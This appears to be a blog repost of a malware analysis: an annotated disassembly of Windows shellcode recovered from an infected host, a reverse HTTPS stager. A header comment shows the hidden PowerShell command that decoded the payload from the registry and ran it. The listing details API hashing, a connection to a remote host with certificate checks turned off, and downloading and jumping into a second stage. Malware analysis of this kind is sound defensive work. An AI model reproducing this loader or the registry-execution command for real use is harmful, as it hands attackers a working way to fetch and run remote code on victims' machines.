; shellcode found on Windows host. Payload was stored in the registry. Powershell
; was used to extract it from the registry and execute it:
; C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -windowstyle \
; hidden -c "$val = (gp HKLM:SOFTWARE\'').''; \
; $d = [System.Text.Encoding]::Unicode.GetString([System.convert]::FromBase64String($val)); iex $d"
; The following references were used to help comment the shellcode
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_https_proxy.asm
; https://hiddencodes.wordpress.com/2014/11/11/api-hash-list-4/
0x00080000: cld cld
0x00080001: call 0x8008f
0x00080006: pushal pushal ; 60
0x00080007: mov ebp, esp ; 98 e5
0x00080009: xor edx, edx ; 31 d2
0x0008000B: mov edx, dword ptr fs:[edx + 0x30]
0x0008000F: mov edx, dword ptr [edx + 0xc]
0x00080012: mov edx, dword ptr [edx + 0x14]
0x00080015: mov esi, dword ptr [edx + 0x28]
0x00080018: movzx ecx, word ptr [edx + 0x26]
0x0008001C: xor edi, edi
0x0008001E: xor eax, eax
0x00080020: lodsb al, byte ptr [esi]
0x00080021: cmp al, 0x61
0x00080023: jl 0x80027
0x00080025: sub al, 0x20
0x00080027: ror edi, 0xd
0x0008002A: add edi, eax
0x0008002C: loop 0x8001e
0x0008002E: push edx
0x0008002F: push edi
0x00080030: mov edx, dword ptr [edx + 0x10]
0x00080033: mov eax, dword ptr [edx + 0x3c]
0x00080036: add eax, edx
0x00080038: mov eax, dword ptr [eax + 0x78]
0x0008003B: test eax, eax
0x0008003D: je 0x80089
0x0008003F: add eax, edx
0x00080041: push eax
0x00080042: mov ecx, dword ptr [eax + 0x18]
0x00080045: mov ebx, dword ptr [eax + 0x20]
0x00080048: add ebx, edx
0x0008004A: jecxz 0x80088
0x0008004C: dec ecx
0x0008004D: mov esi, dword ptr [ebx + ecx*4]
0x00080050: add esi, edx
0x00080052: xor edi, edi
0x00080054: xor eax, eax
0x00080056: lodsb al, byte ptr [esi]
0x00080057: ror edi, 0xd
0x0008005A: add edi, eax
0x0008005C: cmp al, ah
0x0008005E: jne 0x80054
0x00080060: add edi, dword ptr [ebp - 8]
0x00080063: cmp edi, dword ptr [ebp + 0x24]
0x00080066: jne 0x8004a
0x00080068: pop eax
0x00080069: mov ebx, dword ptr [eax + 0x24]
0x0008006C: add ebx, edx
0x0008006E: mov cx, word ptr [ebx + ecx*2]
0x00080072: mov ebx, dword ptr [eax + 0x1c]
0x00080075: add ebx, edx
0x00080077: mov eax, dword ptr [ebx + ecx*4]
0x0008007A: add eax, edx
0x0008007C: mov dword ptr [esp + 0x24], eax
0x00080080: pop ebx ; 5b
0x00080081: pop ebx ; 5b
0x00080082: popal popal ; 61
0x00080083: pop ecx ; 59
0x00080084: pop edx ; 5a
0x00080085: push ecx ; 51
0x00080086: jmp eax ; ff e0
0x00080088: pop eax ; 58
0x00080089: pop edi
0x0008008A: pop edx
0x0008008B: mov edx, dword ptr [edx]
0x0008008D: jmp 0x80015
0x0008008F: pop ebp
; load wininet
0x00080090: push 0x74656e ; Push the bytes 'wininet',0 onto the stack.
0x00080095: push 0x696e6977 ; ...
0x0008009A: push esp ; Push a pointer to the "wininet" string on the stack.
0x0008009B: push 0x726774c ; hash( "kernel32.dll", "LoadLibraryA" )
0x000800A0: call ebp ; LoadLibraryA( "wininet" )
0x000800A2: call 0x80127
; user agent string - Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0; ASU2JS)
; INTERNETAPI_(HINTERNET) InternetOpenA(
; LPCSTR lpszAgent,
; DWORD dwAccessType,
; LPCSTR lpszProxy,
; LPCSTR lpszProxyBypass,
; DWORD dwFlags);
0x0008012C: push edi
0x0008012D: push edi
0x0008012E: push ecx
0x0008012F: push 0xa779563a ; hash( "wininet.dll", "InternetOpenA" )
0x00080134: call ebp
0x00080136: jmp 0x801ce
; void InternetConnectA(
; HINTERNET hInternet,
; LPCSTR lpszServerName,
; INTERNET_PORT nServerPort,
; LPCSTR lpszUserName,
; LPCSTR lpszPassword,
; DWORD dwService,
; DWORD dwFlags,
; DWORD_PTR dwContext);
0x0008013B: pop ebx ; pop URL (hostname), store in ebx
0x0008013C: xor ecx, ecx ; NULL
0x0008013E: push ecx ; DWORD_PTR dwContext (NULL)
0x0008013F: push ecx ; dwFlags (NULL)
0x00080140: push 3 ; DWORD dwService (INTERNET_SERVICE_HTTP)
0x00080142: push ecx ; password (NULL)
0x00080143: push ecx ; username (NULL)
0x00080144: push 0x1bb ; port 443
0x00080149: push ebx ; hostname
0x0008014A: push eax ; HINTERNET hInternet
0x0008014B: push 0xc69f8957 ; hash( "wininet.dll", "InternetConnectA" )
0x00080150: call ebp
0x00080152: mov ebx, eax ; save hInternet
0x00080154: jmp 0x801d0
; INTERNETAPI_(HINTERNET) HttpOpenRequestA(
; HINTERNET hConnect,
; LPCSTR lpszVerb,
; LPCSTR lpszObjectName,
; LPCSTR lpszVersion,
; LPCSTR lpszReferrer,
; LPCSTR *lplpszAcceptTypes,
; DWORD dwFlags,
; DWORD_PTR dwContext);
0x00080156: pop ecx
0x00080157: xor edx, edx ; NULL
0x00080159: push edx ; dwContext (NULL)
0x0008015A: push 0x84a03200 ; ( 0x80000000 | 0x04000000 | 0x00800000 | 0x00200000 |0x00001000 |0x00002000 |0x00000200) ; dwFlags
; 0x80000000 | ; INTERNET_FLAG_RELOAD
; 0x04000000 | ; INTERNET_NO_CACHE_WRITE
; 0x00800000 | ; INTERNET_FLAG_SECURE
; 0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
; 0x00001000 | ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
; 0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
; 0x00000200 ; INTERNET_FLAG_NO_UI
0x0008015F: push edx ; accept types (NULL)
0x00080160: push edx ; referrer (NULL)
0x00080161: push edx ; version (NULL)
0x00080162: push ecx ; url
0x00080163: push edx ; method
0x00080164: push eax ; hConnection
0x00080165: push 0x3b2e55eb ; hash( "wininet.dll", "HttpOpenRequestA" )
0x0008016A: call ebp
0x0008016C: mov esi, eax ; hHttpRequest
; BOOLAPI InternetSetOptionA(
; HINTERNET hInternet,
; DWORD dwOption,
; LPVOID lpBuffer,
; DWORD dwBufferLength);
0x0008016E: push 0x3380 ; 0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
; 0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
; 0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
; 0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
; 0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
0x00080173: mov eax, esp ; move flags into eax
0x00080175: push 4 ; sizeof(dwFlags)
0x00080177: push eax ; &dwFlags
0x00080178: push 0x1f ; DWORD dwOption (31 = INTERNET_OPTION_SECURITY_FLAGS)
0x0008017A: push esi ; hRequest
0x0008017B: push 0x869e4675 ; hash( "wininet.dll", "InternetSetOptionA" )
0x00080180: call ebp
; BOOLAPI HttpSendRequestA(
; HINTERNET hRequest,
; LPCSTR lpszHeaders,
; DWORD dwHeadersLength,
; LPVOID lpOptional,
; DWORD dwOptionalLength);
0x00080182: xor edi, edi ; NULL
0x00080184: push edi ; optional length
0x00080185: push edi ; optional
0x00080186: push edi ; dwHeadersLength
0x00080187: push edi ; headers
0x00080188: push esi ; hHttpRequest
0x00080189: push 0x7b18062d ; hash( "wininet.dll", "HttpSendRequestA" )
0x0008018E: call ebp
0x00080190: test eax, eax ; test for failure
0x00080192: je 0x801dc
0x00080194: xor edi, edi
0x00080196: test esi, esi
0x00080198: je 0x8019e
0x0008019A: mov ecx, edi
0x0008019C: jmp 0x801a7
0x0008019E: push 0x5de2c5aa ; hash( "kernel32.dll", "GetLastError" )
0x000801A3: call ebp
0x000801A5: mov ecx, eax
0x000801A7: push 0x315e2145 ; GetDesktopWindow
0x000801AC: call ebp
0x000801AE: xor edi, edi
0x000801B0: push edi
0x000801B1: push 7
0x000801B3: push ecx
0x000801B4: push esi
0x000801B5: push eax
0x000801B6: push 0xbe057b7 ; InternetErrorDlg
0x000801BB: call ebp
0x000801BD: mov edi, 0x2f00
0x000801C2: cmp edi, eax
0x000801C4: jne 0x801ca
0x000801C6: mov eax, ebx
0x000801C8: jmp 0x80154
0x000801CA: xor edi, edi
0x000801CC: jmp 0x801e3
0x000801CE: jmp 0x80219
0x000801D0: call 0x80156
0x000801D5: das das
0x000801D6: push ebx
0x000801D7: outsw dx, word ptr [esi]
0x000801D9: xor al, 0
0x000801DB: add byte ptr [eax - 0x10], ch
0x000801DE: mov ch, 0xa2
0x000801E0: push esi
0x000801E1: call ebp
0x000801E3: push 0x40 ; PAGE_EXECUTE_READWRITE
0x000801E5: push 0x1000 ; MEM_COMMIT
0x000801EA: push 0x400000 ; Stage allocation (8Mb ought to do us)
0x000801EF: push edi ; NULL
0x000801F0: push 0xe553a458 ; hash( "kernel32.dll", "VirtualAlloc" )
0x000801F5: call ebp ; VirtualAlloc( NULL, dwLength, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
0x000801F7: xchg eax, ebx
0x000801F8: push ebx
0x000801F9: push ebx
0x000801FA: mov edi, esp
0x000801FC: push edi ; &bytesRead
0x000801FD: push 0x2000 ; read length
0x00080202: push ebx ; buffer
0x00080203: push esi ; hRequest
0x00080204: push 0xe2899612 ; hash( "wininet.dll", "InternetReadFile" )
0x00080209: call ebp
0x0008020B: test eax, eax ; download failed? (optional?)
0x0008020D: je 0x801dc ; failure???
0x0008020F: mov eax, dword ptr [edi]
0x00080211: add ebx, eax ; buffer += bytes_received
0x00080213: test eax, eax ; optional?
0x00080215: jne 0x801fc ; download_more???
0x00080217: pop eax ; clear the temporary storage
0x00080218: ret ret ; dive into the stored stage address
0x00080219: call 0x8013b ; InternetConnectA
url:
; 0x0008021E: 61
; url foobar.com
출처 : https://gist.github.com/jdferrell3/4db966da06f4fa77816a54d802aca0f8
'[+] etc..' 카테고리의 다른 글
python_Crat_strdecoder (0) | 2020.08.03 |
---|---|
yara_Crat_encStr (0) | 2020.06.05 |
yara_signing_Exchange (0) | 2020.05.10 |
data structure (0) | 2020.04.30 |
yara_Nemty_memoryLoader (0) | 2019.09.20 |